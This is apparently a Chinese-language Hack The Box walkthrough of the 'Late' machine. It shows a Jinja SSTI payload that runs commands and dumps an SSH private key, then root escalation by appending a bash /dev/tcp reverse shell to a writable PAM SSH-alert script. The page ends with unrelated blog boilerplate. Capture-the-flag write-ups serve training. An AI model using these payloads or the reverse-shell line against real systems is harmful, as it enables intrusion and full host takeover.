Late(SSTI)

服務(wù)探測(cè)

┌──(root??kali)-[~/htb]
└─# nmap -p- --open 10.10.11.156 -Pn
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-29 22:51 EDT
Nmap scan report for 10.10.11.156
Host is up (0.27s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 126.65 seconds
                                                                                                                    
┌──(root??kali)-[~/htb]
└─# nmap -sV -Pn -A -O 10.10.11.156 -p 22,80      
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-29 22:53 EDT
Nmap scan report for 10.10.11.156
Host is up (0.49s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 02:5e:29:0e:a3:af:4e:72:9d:a4:fe:0d:cb:5d:83:07 (RSA)
|   256 41:e1:fe:03:a5:c7:97:c4:d5:16:77:f3:41:0c:e9:fb (ECDSA)
|_  256 28:39:46:98:17:1e:46:1a:1e:a1:ab:3b:9a:57:70:48 (ED25519)
80/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Late - Best online image tools
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (95%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.3 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   486.69 ms 10.10.16.1
2   243.78 ms 10.10.11.156

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.65 seconds

web

80端口打開(kāi)是兩個(gè)靜態(tài)頁(yè)面

在底部頁(yè)面找到一個(gè)郵件賬號(hào):support@late.htb

存在一個(gè)late.htb的域名车份,添加到host文件

vhost爆破

┌──(root?rock)-[~]
└─# gobuster vhost -u late.htb -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -t 100
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:          http://late.htb
[+] Method:       GET
[+] Threads:      100
[+] Wordlist:     /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent:   gobuster/3.1.0
[+] Timeout:      10s
===============================================================
2022/09/30 11:18:34 Starting gobuster in VHOST enumeration mode
===============================================================
Found: images.late.htb (Status: 200) [Size: 2187]
                                                 
===============================================================
2022/09/30 11:20:05 Finished
===============================================================

出來(lái)一個(gè) images.late.htb域名哎媚,加到host文件

這個(gè)站點(diǎn)可以把上傳的圖片里的文字掃描出一個(gè)txt輸出

SSTI

準(zhǔn)備一張圖片萤衰,內(nèi)容如下:

{{7*7}}

上傳完成以后輸出為:

<p>49
</p>

證明存在SSTI(Server Side Template Injection)

截圖下面命令進(jìn)行注入:

(注意:.read()之前有一個(gè)空格)


{{ cycler.__init__.__globals__.os.popen('id') .read() }}

輸出

<p>uid=1000(svc_acc) gid=1000(svc_acc) groups=1000(svc_acc)

</p>

下面命令返回一個(gè)ssh秘鑰文件(這里試了好久..)



       
     {{ cycler.__init__.__globals__.os.popen(" cat /home/svc_acc/.ssh/id_rsa ") .read() }}


返回

<p>-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAqe5XWFKVqleCyfzPo4HsfRR8uF/P/3Tn+fiAUHhnGvBBAyrM
HiP3S/DnqdIH2uqTXdPk4eGdXynzMnFRzbYb+cBa+R8T/nTa3PSuR9tkiqhXTaEO
bgjRSynr2NuDWPQhX8OmhAKdJhZfErZUcbxiuncrKnoClZLQ6ZZDaNTtTUwpUaMi
/mtaHzLID1KTl+dUFsLQYmdRUA639xkz1YvDF5ObIDoeHgOU7rZV4TqA6s6gI7W7
d137M3Oi2WTWRBzcWTAMwfSJ2cEttvS/AnE/B2Eelj1shYUZuPyIoLhSMicGnhB7
7IKpZeQ+MgksRcHJ5fJ2hvTu/T3yL9tggf9DsQIDAQABAoIBAHCBinbBhrGW6tLM
fLSmimptq/1uAgoB3qxTaLDeZnUhaAmuxiGWcl5nCxoWInlAIX1XkwwyEb01yvw0
ppJp5a+/OPwDJXus5lKv9MtCaBidR9/vp9wWHmuDP9D91MKKL6Z1pMN175GN8jgz
W0lKDpuh1oRy708UOxjMEalQgCRSGkJYDpM4pJkk/c7aHYw6GQKhoN1en/7I50IZ
uFB4CzS1bgAglNb7Y1bCJ913F5oWs0dvN5ezQ28gy92pGfNIJrk3cxO33SD9CCwC
T9KJxoUhuoCuMs00PxtJMymaHvOkDYSXOyHHHPSlIJl2ZezXZMFswHhnWGuNe9IH
Ql49ezkCgYEA0OTVbOT/EivAuu+QPaLvC0N8GEtn7uOPu9j1HjAvuOhom6K4troi
WEBJ3pvIsrUlLd9J3cY7ciRxnbanN/Qt9rHDu9Mc+W5DQAQGPWFxk4bM7Zxnb7Ng
Hr4+hcK+SYNn5fCX5qjmzE6c/5+sbQ20jhl20kxVT26MvoAB9+I1ku8CgYEA0EA7
t4UB/PaoU0+kz1dNDEyNamSe5mXh/Hc/mX9cj5cQFABN9lBTcmfZ5R6I0ifXpZuq
0xEKNYA3HS5qvOI3dHj6O4JZBDUzCgZFmlI5fslxLtl57WnlwSCGHLdP/knKxHIE
uJBIk0KSZBeT8F7IfUukZjCYO0y4HtDP3DUqE18CgYBgI5EeRt4lrMFMx4io9V3y
3yIzxDCXP2AdYiKdvCuafEv4pRFB97RqzVux+hyKMthjnkpOqTcetysbHL8k/1pQ
GUwuG2FQYrDMu41rnnc5IGccTElGnVV1kLURtqkBCFs+9lXSsJVYHi4fb4tZvV8F
ry6CZuM0ZXqdCijdvtxNPQKBgQC7F1oPEAGvP/INltncJPRlfkj2MpvHJfUXGhMb
Vh7UKcUaEwP3rEar270YaIxHMeA9OlMH+KERW7UoFFF0jE+B5kX5PKu4agsGkIfr
kr9wto1mp58wuhjdntid59qH+8edIUo4ffeVxRM7tSsFokHAvzpdTH8Xl1864CI+
Fc1NRQKBgQDNiTT446GIijU7XiJEwhOec2m4ykdnrSVb45Y6HKD9VS6vGeOF1oAL
K6+2ZlpmytN3RiR9UDJ4kjMjhJAiC7RBetZOor6CBKg20XA1oXS7o1eOdyc/jSk0
kxruFUgLHh7nEx/5/0r8gmcoCvFn98wvUPSNrgDJ25mnwYI0zzDrEw==
-----END RSA PRIVATE KEY-----

</p>

拿到初始shell

┌──(root??kali)-[~/htb/late]
└─# ssh -i id_rsa svc_acc@10.10.11.156                   
The authenticity of host '10.10.11.156 (10.10.11.156)' can't be established.
RSA key fingerprint is SHA256:E2YWHVFBETYjBCFqBT19Ku0JwcmcqVUAzxnT+e1e2Ms.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.156' (RSA) to the list of known hosts.
svc_acc@late:~$ whoami
svc_acc
svc_acc@late:~$ ls
app  user.txt
svc_acc@late:~$ cat user.txt
b11ed2e2b80179f7...

提權(quán)

linpeas枚舉到一個(gè)腳本

svc_acc@late:/usr/local/sbin$ cat ssh-alert.sh
#!/bin/bash

RECIPIENT="root@late.htb"
SUBJECT="Email from Server Login: SSH Alert"

BODY="
A SSH login was detected.

        User:        $PAM_USER
        User IP Host: $PAM_RHOST
        Service:     $PAM_SERVICE
        TTY:         $PAM_TTY
        Date:        `date`
        Server:      `uname -a`
"

if [ ${PAM_TYPE} = "open_session" ]; then
        echo "Subject:${SUBJECT} ${BODY}" | /usr/sbin/sendmail ${RECIPIENT}
fi

看起來(lái)是ssh登錄的時(shí)候會(huì)觸發(fā)這個(gè)腳本

不可以直接寫(xiě)shell進(jìn)這個(gè)腳本杨名,但是可以通過(guò)這種方式寫(xiě)進(jìn)去

svc_acc@late:/usr/local/sbin$ echo "bash -i >& /dev/tcp/10.10.16.3/443 0>&1" > 1.txt
svc_acc@late:/usr/local/sbin$ cat 1.txt 
bash -i >& /dev/tcp/10.10.16.3/443 0>&1
svc_acc@late:/usr/local/sbin$ cat 1.txt >> ssh-alert.sh
svc_acc@late:/usr/local/sbin$ cat ssh-alert.sh 
#!/bin/bash

RECIPIENT="root@late.htb"
SUBJECT="Email from Server Login: SSH Alert"

BODY="
A SSH login was detected.

        User:        $PAM_USER
        User IP Host: $PAM_RHOST
        Service:     $PAM_SERVICE
        TTY:         $PAM_TTY
        Date:        `date`
        Server:      `uname -a`
"

if [ ${PAM_TYPE} = "open_session" ]; then
        echo "Subject:${SUBJECT} ${BODY}" | /usr/sbin/sendmail ${RECIPIENT}
fi


bash -i >& /dev/tcp/10.10.16.3/443 0>&1

拿到root flag

┌──(root??kali)-[~/htb/late]
└─# nc -lnvp 443                                                                                           1 ?
listening on [any] 443 ...
connect to [10.10.16.3] from (UNKNOWN) [10.10.11.156] 57212
bash: cannot set terminal process group (14151): Inappropriate ioctl for device
bash: no job control in this shell
root@late:/# cd /root
cd /root
root@late:/root# ls
ls
root.txt
scripts
root@late:/root# cat root.txt
cat root.txt
1fed2702ad7571f1d..

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末抚吠,一起剝皮案震驚了整個(gè)濱河市冀痕,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌萝毛,老刑警劉巖项阴,帶你破解...
    沈念sama閱讀 217,509評(píng)論 6 504
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場(chǎng)離奇詭異笆包,居然都是意外死亡环揽,警方通過(guò)查閱死者的電腦和手機(jī),發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 92,806評(píng)論 3 394
  • 文/潘曉璐 我一進(jìn)店門(mén)色查,熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái)薯演,“玉大人撞芍,你說(shuō)我怎么就攤上這事秧了。” “怎么了序无?”我有些...
    開(kāi)封第一講書(shū)人閱讀 163,875評(píng)論 0 354
  • 文/不壞的土叔 我叫張陵验毡,是天一觀的道長(zhǎng)。 經(jīng)常有香客問(wèn)我帝嗡,道長(zhǎng)晶通,這世上最難降的妖魔是什么? 我笑而不...
    開(kāi)封第一講書(shū)人閱讀 58,441評(píng)論 1 293
  • 正文 為了忘掉前任哟玷,我火速辦了婚禮狮辽,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘巢寡。我一直安慰自己喉脖,他們只是感情好,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,488評(píng)論 6 392
  • 文/花漫 我一把揭開(kāi)白布抑月。 她就那樣靜靜地躺著树叽,像睡著了一般。 火紅的嫁衣襯著肌膚如雪谦絮。 梳的紋絲不亂的頭發(fā)上题诵,一...
    開(kāi)封第一講書(shū)人閱讀 51,365評(píng)論 1 302
  • 那天洁仗,我揣著相機(jī)與錄音,去河邊找鬼性锭。 笑死赠潦,一個(gè)胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的草冈。 我是一名探鬼主播祭椰,決...
    沈念sama閱讀 40,190評(píng)論 3 418
  • 文/蒼蘭香墨 我猛地睜開(kāi)眼,長(zhǎng)吁一口氣:“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼疲陕!你這毒婦竟也來(lái)了方淤?” 一聲冷哼從身側(cè)響起,我...
    開(kāi)封第一講書(shū)人閱讀 39,062評(píng)論 0 276
  • 序言:老撾萬(wàn)榮一對(duì)情侶失蹤蹄殃,失蹤者是張志新(化名)和其女友劉穎携茂,沒(méi)想到半個(gè)月后,有當(dāng)?shù)厝嗽跇?shù)林里發(fā)現(xiàn)了一具尸體诅岩,經(jīng)...
    沈念sama閱讀 45,500評(píng)論 1 314
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡讳苦,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,706評(píng)論 3 335
  • 正文 我和宋清朗相戀三年,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了吩谦。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片鸳谜。...
    茶點(diǎn)故事閱讀 39,834評(píng)論 1 347
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡,死狀恐怖式廷,靈堂內(nèi)的尸體忽然破棺而出咐扭,到底是詐尸還是另有隱情,我是刑警寧澤滑废,帶...
    沈念sama閱讀 35,559評(píng)論 5 345
  • 正文 年R本政府宣布蝗肪,位于F島的核電站,受9級(jí)特大地震影響蠕趁,放射性物質(zhì)發(fā)生泄漏薛闪。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,167評(píng)論 3 328
  • 文/蒙蒙 一俺陋、第九天 我趴在偏房一處隱蔽的房頂上張望豁延。 院中可真熱鬧,春花似錦腊状、人聲如沸诱咏。這莊子的主人今日做“春日...
    開(kāi)封第一講書(shū)人閱讀 31,779評(píng)論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)胰苏。三九已至,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間硕并,已是汗流浹背法焰。 一陣腳步聲響...
    開(kāi)封第一講書(shū)人閱讀 32,912評(píng)論 1 269
  • 我被黑心中介騙來(lái)泰國(guó)打工, 沒(méi)想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留倔毙,地道東北人埃仪。 一個(gè)月前我還...
    沈念sama閱讀 47,958評(píng)論 2 370
  • 正文 我出身青樓,卻偏偏與公主長(zhǎng)得像陕赃,于是被迫代替她去往敵國(guó)和親卵蛉。 傳聞我的和親對(duì)象是個(gè)殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 44,779評(píng)論 2 354

推薦閱讀更多精彩內(nèi)容

  • Spring Cloud為開(kāi)發(fā)人員提供了快速構(gòu)建分布式系統(tǒng)中一些常見(jiàn)模式的工具(例如配置管理么库,服務(wù)發(fā)現(xiàn)傻丝,斷路器,智...
    卡卡羅2017閱讀 134,654評(píng)論 18 139
  • 暑假快開(kāi)始時(shí)做的第一臺(tái)hard靶機(jī)诉儒。當(dāng)時(shí)收獲挺大的葡缰。因?yàn)檫@個(gè)好的開(kāi)頭所以現(xiàn)在已經(jīng)逐漸適應(yīng)hard難度了 因?yàn)楝F(xiàn)在還...
    byc_404閱讀 2,421評(píng)論 0 3
  • 1、不安全的隨機(jī)數(shù)生成忱反,在CSRF TOKEN生成泛释、password reset token生成等,會(huì)造成toke...
    nightmare丿閱讀 3,694評(píng)論 0 1
  • 免責(zé)聲明 本文滲透的主機(jī)經(jīng)過(guò)合法授權(quán)。本文使用的工具和方法僅限學(xué)習(xí)交流使用注竿,請(qǐng)不要將文中使用的工具和滲透思路用于任...
    天線鍋?zhàn)?/span>閱讀 374評(píng)論 0 1
  • Spring Boot 參考指南 介紹 轉(zhuǎn)載自:https://www.gitbook.com/book/qbgb...
    毛宇鵬閱讀 46,810評(píng)論 6 342